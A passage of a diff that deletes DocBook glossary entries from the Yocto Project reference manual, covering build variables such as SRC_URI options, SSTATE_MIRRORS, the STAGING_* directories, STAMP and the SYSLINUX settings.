-                            Apply the patch only if <filename>SRCREV</filename>
-                            is equal to <filename>rev</filename>.
-                            </para></listitem>
-                        <listitem><para><emphasis><filename>notrev</filename> -</emphasis>
-                            Apply the patch only if <filename>SRCREV</filename>
-                            is not equal to <filename>rev</filename>.
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-
-                <para>
-                    Here are some additional options worth mentioning:
-                    <itemizedlist>
-                        <listitem><para><emphasis><filename>unpack</filename> -</emphasis> Controls
-                            whether or not to unpack the file if it is an archive.
-                            The default action is to unpack the file.</para></listitem>
-                        <listitem><para><emphasis><filename>destsuffix</filename> -</emphasis> Places the file
-                            (or extracts its contents) into the specified
-                            subdirectory of <link linkend='var-WORKDIR'><filename>WORKDIR</filename></link>
-                            when the Git fetcher is used.
-                            </para></listitem>
-                        <listitem><para><emphasis><filename>subdir</filename> -</emphasis> Places the file
-                            (or extracts its contents) into the specified
-                            subdirectory of <filename>WORKDIR</filename>
-                            when the local (<filename>file://</filename>)
-                            fetcher is used.
-                            </para></listitem>
-                        <listitem><para><emphasis><filename>localdir</filename> -</emphasis> Places the file
-                            (or extracts its contents) into the specified
-                            subdirectory of <filename>WORKDIR</filename> when
-                            the CVS fetcher is used.
-                            </para></listitem>
-                        <listitem><para><emphasis><filename>subpath</filename> -</emphasis>
-                            Limits the checkout to a specific subpath of the
-                            tree when using the Git fetcher is used.
-                            </para></listitem>
-                        <listitem><para><emphasis><filename>name</filename> -</emphasis> Specifies a
-                            name to be used for association with <filename>SRC_URI</filename> checksums
-                            when you have more than one file specified in <filename>SRC_URI</filename>.
-                            </para></listitem>
-                        <listitem><para><emphasis><filename>downloadfilename</filename> -</emphasis> Specifies
-                            the filename used when storing the downloaded file.</para></listitem>
-                    </itemizedlist>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SRC_URI_OVERRIDES_PACKAGE_ARCH'><glossterm>SRC_URI_OVERRIDES_PACKAGE_ARCH</glossterm>
-            <info>
-                SRC_URI_OVERRIDES_PACKAGE_ARCH[doc] = "By default, the OpenEmbedded build system automatically detects whether SRC_URI contains files that are machine-specific. If so, the build system automatically changes PACKAGE_ARCH. Setting this variable to '0' disables this behavior."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    By default, the OpenEmbedded build system automatically detects whether
-                    <filename><link linkend='var-SRC_URI'>SRC_URI</link></filename>
-                    contains files that are machine-specific.
-                    If so, the build system automatically changes
-                    <filename><link linkend='var-PACKAGE_ARCH'>PACKAGE_ARCH</link></filename>.
-                    Setting this variable to "0" disables this behavior.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SRCDATE'><glossterm>SRCDATE</glossterm>
-            <info>
-                SRCDATE[doc] = "The date of the source code used to build the package. This variable applies only if the source was fetched from a Source Code Manager (SCM)."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The date of the source code used to build the package.
-                    This variable applies only if the source was fetched from a Source Code Manager (SCM).
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SRCPV'><glossterm>SRCPV</glossterm>
-            <info>
-                SRCPV[doc] = "Returns the version string of the current package. This string is used to help define the value of PV."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Returns the version string of the current package.
-                    This string is used to help define the value of
-                    <link linkend='var-PV'><filename>PV</filename></link>.
-                </para>
-
-                <para>
-                    The <filename>SRCPV</filename> variable is defined in the
-                    <filename>meta/conf/bitbake.conf</filename> configuration
-                    file in the
-                    <link linkend='source-directory'>Source Directory</link>
-                    as follows:
-                    <literallayout class='monospaced'>
-     SRCPV = "${@bb.fetch2.get_srcrev(d)}"
-                    </literallayout>
-                </para>
-
-                <para>
-                    Recipes that need to define <filename>PV</filename> do so
-                    with the help of the <filename>SRCPV</filename>.
-                    For example, the <filename>ofono</filename> recipe
-                    (<filename>ofono_git.bb</filename>) located in
-                    <filename>meta/recipes-connectivity</filename> in the
-                    Source Directory defines <filename>PV</filename> as
-                    follows:
-                    <literallayout class='monospaced'>
-     PV = "0.12-git${SRCPV}"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SRCREV'><glossterm>SRCREV</glossterm>
-            <info>
-                SRCREV[doc] = "The revision of the source code used to build the package. This variable applies to Subversion, Git, Mercurial, and Bazaar only."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The revision of the source code used to build the package.
-                    This variable applies to Subversion, Git, Mercurial, and
-                    Bazaar only.
-                    Note that if you want to build a fixed revision and you
-                    want to avoid performing a query on the remote repository
-                    every time BitBake parses your recipe, you should specify
-                    a <filename>SRCREV</filename> that is a
-                    full revision identifier and not just a tag.
-                    <note>
-                        For information on limitations when inheriting the
-                        latest revision of software using
-                        <filename>SRCREV</filename>, see the
-                        <link linkend='var-AUTOREV'><filename>AUTOREV</filename></link>
-                        variable description and the
-                        "<ulink url='&YOCTO_DOCS_DEV_URL;#automatically-incrementing-a-binary-package-revision-number'>Automatically Incrementing a Binary Package Revision Number</ulink>"
-                        section, which is in the Yocto Project Development
-                        Tasks Manual.
-                    </note>
-                </para>
-
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SSTATE_DIR'><glossterm>SSTATE_DIR</glossterm>
-            <info>
-                SSTATE_DIR[doc] = "The directory for the shared state cache."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The directory for the shared state cache.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SSTATE_MIRROR_ALLOW_NETWORK'><glossterm>SSTATE_MIRROR_ALLOW_NETWORK</glossterm>
-            <info>
-                SSTATE_MIRROR_ALLOW_NETWORK[doc] = "If set to "1", allows fetches from mirrors that are specified in SSTATE_MIRRORS to work even when fetching from the network is disabled by setting BB_NO_NETWORK to "1"."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    If set to "1", allows fetches from
-                    mirrors that are specified in
-                    <link linkend='var-SSTATE_MIRRORS'><filename>SSTATE_MIRRORS</filename></link>
-                    to work even when fetching from the network is
-                    disabled by setting <filename>BB_NO_NETWORK</filename>
-                    to "1".
-                    Using the
-                    <filename>SSTATE_MIRROR_ALLOW_NETWORK</filename>
-                    variable is useful if you have set
-                    <filename>SSTATE_MIRRORS</filename> to point to an
-                    internal server for your shared state cache, but
-                    you want to disable any other fetching from the network.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SSTATE_MIRRORS'><glossterm>SSTATE_MIRRORS</glossterm>
-            <info>
-                SSTATE_MIRRORS[doc] = "Configures the OpenEmbedded build system to search other mirror locations for prebuilt cache data objects before building out the data. You can specify a filesystem directory or a remote URL such as HTTP or FTP."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Configures the OpenEmbedded build system to search other
-                    mirror locations for prebuilt cache data objects before
-                    building out the data.
-                    This variable works like fetcher
-                    <link linkend='var-MIRRORS'><filename>MIRRORS</filename></link>
-                    and <link linkend='var-PREMIRRORS'><filename>PREMIRRORS</filename></link>
-                    and points to the cache locations to check for the shared
-                    state (sstate) objects.
-                </para>
-
-                <para>
-                    You can specify a filesystem directory or a remote URL such
-                    as HTTP or FTP.
-                    The locations you specify need to contain the shared state
-                    cache (sstate-cache) results from previous builds.
-                    The sstate-cache you point to can also be from builds on
-                    other machines.
-                </para>
-
-                <para>
-                    When pointing to sstate build artifacts on another machine
-                    that uses a different GCC version for native builds,
-                    you must configure <filename>SSTATE_MIRRORS</filename>
-                    with a regular expression that maps local search paths
-                    to server paths.
-                    The paths need to take into account
-                    <link linkend='var-NATIVELSBSTRING'><filename>NATIVELSBSTRING</filename></link>
-                    set by the
-                    <link linkend='ref-classes-uninative'><filename>uninative</filename></link>
-                    class.
-                    For example, the following maps the local search path
-                    <filename>universal-4.9</filename> to the server-provided
-                    path <replaceable>server_url_sstate_path</replaceable>:
-                    <literallayout class='monospaced'>
-     SSTATE_MIRRORS ?= file://universal-4.9/(.*) http://<replaceable>server_url_sstate_path</replaceable>/universal-4.8/\1 \n
-                    </literallayout>
-                </para>
-
-                <para>
-                    If a mirror uses the same structure as
-                    <link linkend='var-SSTATE_DIR'><filename>SSTATE_DIR</filename></link>,
-                    you need to add
-                    "PATH" at the end as shown in the examples below.
-                    The build system substitutes the correct path within the
-                    directory structure.
-                    <literallayout class='monospaced'>
-     SSTATE_MIRRORS ?= "\
-     file://.* http://<replaceable>someserver</replaceable>.tld/share/sstate/PATH;downloadfilename=PATH \n \
-     file://.* file:///<replaceable>some-local-dir</replaceable>/sstate/PATH"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SSTATE_SCAN_FILES'><glossterm>SSTATE_SCAN_FILES</glossterm>
-            <info>
-                SSTATE_SCAN_FILES[doc] = "Controls the list of files the OpenEmbedded build system scans for hardcoded installation paths."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Controls the list of files the OpenEmbedded build system
-                    scans for hardcoded installation paths. The variable uses a
-                    space-separated list of filenames (not paths) with standard
-                    wildcard characters allowed.
-                </para>
-
-                <para>
-                    During a build, the OpenEmbedded build system creates a
-                    shared state (sstate) object during the first stage of
-                    preparing the sysroots. That object is scanned for
-                    hardcoded paths for original installation locations.
-                    The list of files that are scanned for paths is controlled
-                    by the <filename>SSTATE_SCAN_FILES</filename> variable.
-                    Typically, recipes add files they want to be scanned to the
-                    value of <filename>SSTATE_SCAN_FILES</filename> rather than
-                    the variable being comprehensively set. The
-                    <link linkend='ref-classes-sstate'><filename>sstate</filename></link>
-                    class specifies the default list of files.
-                </para>
-
-                <para>
-                    For details on the process, see the
-                    <link linkend='ref-classes-staging'><filename>staging</filename></link>
-                    class.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-STAGING_BASE_LIBDIR_NATIVE'><glossterm>STAGING_BASE_LIBDIR_NATIVE</glossterm>
-            <info>
-                STAGING_BASE_LIBDIR_NATIVE[doc] = "Specifies the path to the /lib subdirectory of the sysroot directory for the build host."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the path to the <filename>/lib</filename>
-                    subdirectory of the sysroot directory for the
-                    build host.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-STAGING_BASELIBDIR'><glossterm>STAGING_BASELIBDIR</glossterm>
-            <info>
-                STAGING_BASELIBDIR[doc] = "Specifies the path to the /lib subdirectory of the sysroot directory for the target for which the current recipe is being built (STAGING_DIR_HOST)."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the path to the <filename>/lib</filename>
-                    subdirectory of the sysroot directory for the target
-                    for which the current recipe is being built
-                    (<link linkend='var-STAGING_DIR_HOST'><filename>STAGING_DIR_HOST</filename></link>).
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-STAGING_BINDIR'><glossterm>STAGING_BINDIR</glossterm>
-            <info>
-                STAGING_BINDIR[doc] = "Specifies the path to the /usr/bin subdirectory of the sysroot directory for the target for which the current recipe is being built (STAGING_DIR_HOST)."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the path to the
-                    <filename>/usr/bin</filename> subdirectory of the
-                    sysroot directory for the target for which the current
-                    recipe is being built
-                    (<link linkend='var-STAGING_DIR_HOST'><filename>STAGING_DIR_HOST</filename></link>).
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-STAGING_BINDIR_CROSS'><glossterm>STAGING_BINDIR_CROSS</glossterm>
-            <info>
-                STAGING_BINDIR_CROSS[doc] = "Specifies the path to the directory containing binary configuration scripts. These scripts provide configuration information for other software that wants to make use of libraries or include files provided by the software associated with the script."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the path to the directory containing binary
-                    configuration scripts.
-                    These scripts provide configuration information for
-                    other software that wants to make use of libraries or
-                    include files provided by the software associated with
-                    the script.
-                    <note>
-                        This style of build configuration has been largely
-                        replaced by <filename>pkg-config</filename>.
-                        Consequently, if <filename>pkg-config</filename>
-                        is supported by the library to which you are linking,
-                        it is recommended you use
-                        <filename>pkg-config</filename> instead of a
-                        provided configuration script.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-STAGING_BINDIR_NATIVE'><glossterm>STAGING_BINDIR_NATIVE</glossterm>
-            <info>
-                STAGING_BINDIR_NATIVE[doc] = "Specifies the path to the /usr/bin subdirectory of the sysroot directory for the build host."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the path to the
-                    <filename>/usr/bin</filename> subdirectory of the
-                    sysroot directory for the build host.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-STAGING_DATADIR'><glossterm>STAGING_DATADIR</glossterm>
-            <info>
-                STAGING_DATADIR[doc] = "Specifies the path to the /usr/share subdirectory of the sysroot directory for the target for which the current recipe is being built (STAGING_DIR_HOST)."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                     Specifies the path to the <filename>/usr/share</filename>
-                     subdirectory of the sysroot directory for the target
-                     for which the current recipe is being built
-                     (<link linkend='var-STAGING_DIR_HOST'><filename>STAGING_DIR_HOST</filename></link>).
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-STAGING_DATADIR_NATIVE'><glossterm>STAGING_DATADIR_NATIVE</glossterm>
-            <info>
-                STAGING_DATADIR_NATIVE[doc] = "Specifies the path to the /usr/share subdirectory of the sysroot directory for the build host."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the path to the <filename>/usr/share</filename>
-                    subdirectory of the sysroot directory for the build host.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-STAGING_DIR'><glossterm>STAGING_DIR</glossterm>
-            <info>
-                STAGING_DIR[doc] = "Helps construct the recipe-sysroots directory, which is used during packaging."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Helps construct the <filename>recipe-sysroots</filename>
-                    directory, which is used during packaging.
-                </para>
-
-                <para>
-                    For information on how staging for recipe-specific
-                    sysroots occurs, see the
-                    <link linkend='ref-tasks-populate_sysroot'><filename>do_populate_sysroot</filename></link>
-                    task, the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#new-sharing-files-between-recipes'>Sharing Files Between Recipes</ulink>"
-                    section in the Yocto Project Development Tasks Manual, the
-                    "<ulink url='&YOCTO_DOCS_OM_URL;#configuration-compilation-and-staging-dev-environment'>Configuration, Compilation, and Staging</ulink>"
-                    section in the Yocto Project Overview and Concepts Manual,
-                    and the
-                    <link linkend='var-SYSROOT_DIRS'><filename>SYSROOT_DIRS</filename></link>
-                    variable.
-                    <note>
-                        Recipes should never write files directly under
-                        the <filename>STAGING_DIR</filename> directory because
-                        the OpenEmbedded build system
-                        manages the directory automatically.
-                        Instead, files should be installed to
-                        <filename>${</filename><link linkend='var-D'><filename>D</filename></link><filename>}</filename>
-                        within your recipe's
-                        <link linkend='ref-tasks-install'><filename>do_install</filename></link>
-                        task and then the OpenEmbedded build system will
-                        stage a subset of those files into the sysroot.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-STAGING_DIR_HOST'><glossterm>STAGING_DIR_HOST</glossterm>
-            <info>
-                STAGING_DIR_HOST[doc] = "Specifies the path to the sysroot directory for the system that the component is built to run on."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the path to the sysroot directory for the system
-                    on which the component is built to run (the system that
-                    hosts the component).
-                    For most recipes, this sysroot is the one in which that
-                    recipe's
-                    <link linkend='ref-tasks-populate_sysroot'><filename>do_populate_sysroot</filename></link>
-                    task copies files.
-                    Exceptions include <filename>-native</filename> recipes,
-                    where the <filename>do_populate_sysroot</filename> task
-                    instead uses
-                    <link linkend='var-STAGING_DIR_NATIVE'><filename>STAGING_DIR_NATIVE</filename></link>.
-                    Depending on the type of recipe and the build target,
-                    <filename>STAGING_DIR_HOST</filename> can have the
-                    following values:
-                    <itemizedlist>
-                        <listitem><para>
-                            For recipes building for the target machine, the
-                            value is
-                            "${<link linkend='var-STAGING_DIR'>STAGING_DIR</link>}/${<link linkend='var-MACHINE'>MACHINE</link>}".
-                            </para></listitem>
-                        <listitem><para>
-                            For native recipes building for the build host, the
-                            value is empty given the assumption that when
-                            building for the build host, the build host's own
-                            directories should be used.
-                            <note>
-                                <para><filename>-native</filename> recipes are
-                                not installed into host paths like such as
-                                <filename>/usr</filename>.
-                                Rather, these recipes are installed into
-                                <filename>STAGING_DIR_NATIVE</filename>.
-                                When compiling <filename>-native</filename>
-                                recipes, standard build environment variables
-                                such as
-                                <link linkend='var-CPPFLAGS'><filename>CPPFLAGS</filename></link>
-                                and
-                                <link linkend='var-CFLAGS'><filename>CFLAGS</filename></link>
-                                are set up so that both host paths and
-                                <filename>STAGING_DIR_NATIVE</filename> are
-                                searched for libraries and headers using, for
-                                example, GCC's <filename>-isystem</filename>
-                                option.</para>
-
-                                <para>Thus, the emphasis is that the
-                                <filename>STAGING_DIR*</filename> variables
-                                should be viewed as input variables by tasks
-                                such as
-                                <link linkend='ref-tasks-configure'><filename>do_configure</filename></link>,
-                                <link linkend='ref-tasks-compile'><filename>do_compile</filename></link>,
-                                and
-                                <link linkend='ref-tasks-install'><filename>do_install</filename></link>.
-                                Having the real system root correspond to
-                                <filename>STAGING_DIR_HOST</filename> makes
-                                conceptual sense for
-                                <filename>-native</filename> recipes, as
-                                they make use of host headers and libraries.
-                                </para>
-                            </note>
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-STAGING_DIR_NATIVE'><glossterm>STAGING_DIR_NATIVE</glossterm>
-            <info>
-                STAGING_DIR_NATIVE[doc] = "Specifies the path to the sysroot directory used when building components that run on the build host itself."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the path to the sysroot directory used when
-                    building components that run on the build host itself.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-STAGING_DIR_TARGET'><glossterm>STAGING_DIR_TARGET</glossterm>
-            <info>
-                STAGING_DIR_TARGET[doc] = "Specifies the path to the sysroot used for the system for which the component generates code."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the path to the sysroot used for the system for
-                    which the component generates code.
-                    For components that do not generate code, which is the
-                    majority, <filename>STAGING_DIR_TARGET</filename> is set
-                    to match
-                    <link linkend='var-STAGING_DIR_HOST'><filename>STAGING_DIR_HOST</filename></link>.
-                </para>
-
-                <para>
-                    Some recipes build binaries that can run on the target
-                    system but those binaries in turn generate code for
-                    another different system (e.g. cross-canadian recipes).
-                    Using terminology from GNU, the primary system is referred
-                    to as the "HOST" and the secondary, or different, system is
-                    referred to as the "TARGET".
-                    Thus, the binaries run on the "HOST" system
-                    and generate binaries for the "TARGET" system.
-                    The <filename>STAGING_DIR_HOST</filename> variable points
-                    to the sysroot used for the "HOST" system, while
-                    <filename>STAGING_DIR_TARGET</filename>
-                    points to the sysroot used for the "TARGET" system.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-STAGING_ETCDIR_NATIVE'><glossterm>STAGING_ETCDIR_NATIVE</glossterm>
-            <info>
-                STAGING_ETCDIR_NATIVE[doc] = "Specifies the path to the /etc subdirectory of the sysroot directory for the build host."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the path to the <filename>/etc</filename>
-                    subdirectory of the sysroot directory for the
-                    build host.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-STAGING_EXECPREFIXDIR'><glossterm>STAGING_EXECPREFIXDIR</glossterm>
-            <info>
-                STAGING_EXECPREFIXDIR[doc] = "Specifies the path to the /usr subdirectory of the sysroot directory for the target for which the current recipe is being built (STAGING_DIR_HOST)."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the path to the <filename>/usr</filename>
-                    subdirectory of the sysroot directory for the target
-                    for which the current recipe is being built
-                    (<link linkend='var-STAGING_DIR_HOST'><filename>STAGING_DIR_HOST</filename></link>).
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-STAGING_INCDIR'><glossterm>STAGING_INCDIR</glossterm>
-            <info>
-                STAGING_INCDIR[doc] = "Specifies the path to the /usr/include subdirectory of the sysroot directory for the target for which the current recipe being built (STAGING_DIR_HOST)."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the path to the
-                    <filename>/usr/include</filename> subdirectory of the
-                    sysroot directory for the target for which the current
-                    recipe being built
-                    (<link linkend='var-STAGING_DIR_HOST'><filename>STAGING_DIR_HOST</filename></link>).
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-STAGING_INCDIR_NATIVE'><glossterm>STAGING_INCDIR_NATIVE</glossterm>
-            <info>
-                STAGING_INCDIR_NATIVE[doc] = "Specifies the path to the /usr/include subdirectory of the sysroot directory for the build host."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the path to the <filename>/usr/include</filename>
-                    subdirectory of the sysroot directory for the build host.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-STAGING_KERNEL_BUILDDIR'><glossterm>STAGING_KERNEL_BUILDDIR</glossterm>
-            <info>
-                STAGING_KERNEL_BUILDDIR[doc] = "Points to the directory containing the kernel build artifacts."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Points to the directory containing the kernel build
-                    artifacts.
-                    Recipes building software that needs to access kernel
-                    build artifacts
-                    (e.g. <filename>systemtap-uprobes</filename>) can look in
-                    the directory specified with the
-                    <filename>STAGING_KERNEL_BUILDDIR</filename> variable to
-                    find these artifacts after the kernel has been built.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-STAGING_KERNEL_DIR'><glossterm>STAGING_KERNEL_DIR</glossterm>
-            <info>
-                STAGING_KERNEL_DIR[doc] = "The directory with kernel headers that are required to build out-of-tree modules."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The directory with kernel headers that are required to build out-of-tree
-                    modules.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-STAGING_LIBDIR'><glossterm>STAGING_LIBDIR</glossterm>
-            <info>
-                STAGING_LIBDIR[doc] = "Specifies the path to the /usr/lib subdirectory of the sysroot directory for the target for which the current recipe is being built (STAGING_DIR_HOST)."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the path to the <filename>/usr/lib</filename>
-                    subdirectory of the sysroot directory for the target for
-                    which the current recipe is being built
-                    (<link linkend='var-STAGING_DIR_HOST'><filename>STAGING_DIR_HOST</filename></link>).
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-STAGING_LIBDIR_NATIVE'><glossterm>STAGING_LIBDIR_NATIVE</glossterm>
-            <info>
-                STAGING_LIBDIR_NATIVE[doc] = "Specifies the path to the /usr/lib subdirectory of the sysroot directory for the build host."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the path to the <filename>/usr/lib</filename>
-                    subdirectory of the sysroot directory for the build host.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-STAMP'><glossterm>STAMP</glossterm>
-            <info>
-                STAMP[doc] = "Specifies the base path used to create recipe stamp files. The path to an actual stamp file is constructed by evaluating this string and then appending additional information."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the base path used to create recipe stamp files.
-                    The path to an actual stamp file is constructed by evaluating this
-                    string and then appending additional information.
-                    Currently, the default assignment for <filename>STAMP</filename>
-                    as set in the <filename>meta/conf/bitbake.conf</filename> file
-                    is:
-                    <literallayout class='monospaced'>
-     STAMP = "${STAMPS_DIR}/${MULTIMACH_TARGET_SYS}/${PN}/${EXTENDPE}${PV}-${PR}"
-                    </literallayout>
-                </para>
-
-                <para>
-                    For information on how BitBake uses stamp files to determine
-                    if a task should be rerun, see the
-                    "<ulink url='&YOCTO_DOCS_OM_URL;#stamp-files-and-the-rerunning-of-tasks'>Stamp Files and the Rerunning of Tasks</ulink>"
-                    section in the Yocto Project Overview and Concepts Manual.
-                </para>
-
-                <para>
-                    See <link linkend='var-STAMPS_DIR'><filename>STAMPS_DIR</filename></link>,
-                    <link linkend='var-MULTIMACH_TARGET_SYS'><filename>MULTIMACH_TARGET_SYS</filename></link>,
-                    <link linkend='var-PN'><filename>PN</filename></link>,
-                    <link linkend='var-EXTENDPE'><filename>EXTENDPE</filename></link>,
-                    <link linkend='var-PV'><filename>PV</filename></link>, and
-                    <link linkend='var-PR'><filename>PR</filename></link> for related variable
-                    information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-STAMPS_DIR'><glossterm>STAMPS_DIR</glossterm>
-            <info>
-                STAMPS_DIR[doc] = "Specifies the base directory in which the OpenEmbedded build system places stamps."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the base directory in which the OpenEmbedded
-                    build system places stamps.
-                    The default directory is
-                    <filename>${TMPDIR}/stamps</filename>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-STRIP'><glossterm>STRIP</glossterm>
-            <info>
-                STRIP[doc] = "Minimal command and arguments to run 'strip' (strip symbols)."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The minimal command and arguments to run
-                    <filename>strip</filename>, which is used to strip
-                    symbols.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SUMMARY'><glossterm>SUMMARY</glossterm>
-            <info>
-                SUMMARY[doc] = "The short (80 characters or less) summary of the binary package for packaging systems such as opkg, rpm, or dpkg. By default, SUMMARY is used to define the DESCRIPTION variable if DESCRIPTION is not set in the recipe."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The short (72 characters or less) summary of the binary package for packaging
-                    systems such as <filename>opkg</filename>, <filename>rpm</filename>, or
-                    <filename>dpkg</filename>.
-                    By default, <filename>SUMMARY</filename> is used to define
-                    the <link linkend='var-DESCRIPTION'><filename>DESCRIPTION</filename></link>
-                    variable if <filename>DESCRIPTION</filename> is not set
-                    in the recipe.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SVNDIR'><glossterm>SVNDIR</glossterm>
-            <info>
-                SVNDIR[doc] = "The directory where Subversion checkouts are stored."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The directory in which files checked out of a Subversion
-                    system are stored.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SYSLINUX_DEFAULT_CONSOLE'><glossterm>SYSLINUX_DEFAULT_CONSOLE</glossterm>
-            <info>
-                SYSLINUX_DEFAULT_CONSOLE[doc] = "Specifies the kernel boot default console."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the kernel boot default console.
-                    If you want to use a console other than the default,
-                    set this variable in your recipe as follows where "X" is
-                    the console number you want to use:
-                    <literallayout class='monospaced'>
-     SYSLINUX_DEFAULT_CONSOLE = "console=ttyX"
-                    </literallayout>
-                </para>
-
-                <para>
-                    The
-                    <link linkend='ref-classes-syslinux'><filename>syslinux</filename></link>
-                    class initially sets this variable to null but then checks
-                    for a value later.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SYSLINUX_OPTS'><glossterm>SYSLINUX_OPTS</glossterm>
-            <info>
-                SYSLINUX_OPTS[doc] = "Lists additional options to add to the syslinux file."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Lists additional options to add to the syslinux file.
-                    You need to set this variable in your recipe.
-                    If you want to list multiple options, separate the options
-                    with a semicolon character (<filename>;</filename>).
-                </para>
-
-                <para>
-                    The
-                    <link linkend='ref-classes-syslinux'><filename>syslinux</filename></link>
-                    class uses this variable to create a set of options.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SYSLINUX_SERIAL'><glossterm>SYSLINUX_SERIAL</glossterm>
-            <info>
-                SYSLINUX_SERIAL[doc] = "Specifies the alternate serial port or turns it off."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the alternate serial port or turns it off.
-                    To turn off serial, set this variable to an empty string
-                    in your recipe.
-                    The variable's default value is set in the
-                    <link linkend='ref-classes-syslinux'><filename>syslinux</filename></link>
-                    class as follows:
-                    <literallayout class='monospaced'>
-     SYSLINUX_SERIAL ?= "0 115200"
-                    </literallayout>
-                </para>
-
-                <para>
-                    The class checks for and uses the variable as needed.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SYSLINUX_SPLASH'><glossterm>SYSLINUX_SPLASH</glossterm>
-            <info>
-                SYSLINUX_SPLASH[doc] = "An .LSS file used as the background for the VGA boot menu when you use the boot menu."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    An <filename>.LSS</filename> file used as the background
-                    for the VGA boot menu when you use the boot menu.
-                    You need to set this variable in your recipe.
-                </para>
-
-                <para>
-                    The
-                    <link linkend='ref-classes-syslinux'><filename>syslinux</filename></link>
-                    class checks for this variable and if found, the
-                    OpenEmbedded build system installs the splash screen.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SYSLINUX_SERIAL_TTY'><glossterm>SYSLINUX_SERIAL_TTY</glossterm>
-            <info>
-                SYSLINUX_SERIAL_TTY[doc] = "Specifies the alternate console=tty... kernel boot argument."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the alternate console=tty... kernel boot argument.
-                    The variable's default value is set in the
-                    <link linkend='ref-classes-syslinux'><filename>syslinux</filename></link>
-                    class as follows:
-                    <literallayout class='monospaced'>
